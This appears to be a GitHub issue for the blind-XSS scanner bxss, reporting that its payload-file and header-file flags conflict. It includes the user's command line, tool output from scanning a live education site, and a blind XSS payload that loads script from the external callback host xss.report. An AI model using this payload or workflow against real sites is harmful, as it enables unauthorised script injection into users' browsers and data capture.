bxss icon indicating copy to clipboard operation
bxss copied to clipboard
verified publisher icon ethicalhackingplayground

Conflict Between -pf and -hf Flags

Open bytes-Knight opened this issue 3 months ago • 0 comments

└─$ cat x1.txt | BXSS -pf ~/file/tools/loxs/payloads/bxss.txt -hf ~/hf.txt -l -c 3 -a -f

| __ ) __ __ ___ ___ | _ \ \ / / / | / | | |) | > < _ \ _
|/ //_\ |/ |/

    v0.0.3

[NOTICE] Please Be Patient for bxss [NOTICE] Checking URL Scheme: https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

================================================================================

[INFO] Using Header: '"> [INFO] Using Trace Mode [INFO] New Payload:'">

[NOTICE] Method: GET [NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

[ERROR] Error making request: Invalid header name (-32602) [NOTICE] Method: POST [NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

[ERROR] Error making request: Invalid header name (-32602) [NOTICE] Method: OPTIONS [NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

[ERROR] Error making request: Invalid header name (-32602) [NOTICE] Method: PUT [NOTICE] https://www.khanacademy.org/search?page_search_query=Gxss&referer=%2F

This tool breaks when I use both -pf and -hf flags together. Instead of taking headers from a different file, it replaces the blind XSS payloads in the headers.

[INFO] Using Header: '"><script src=https://xss.report/c/X></script>

bytes-Knight avatar Sep 10 '25 19:09 bytes-Knight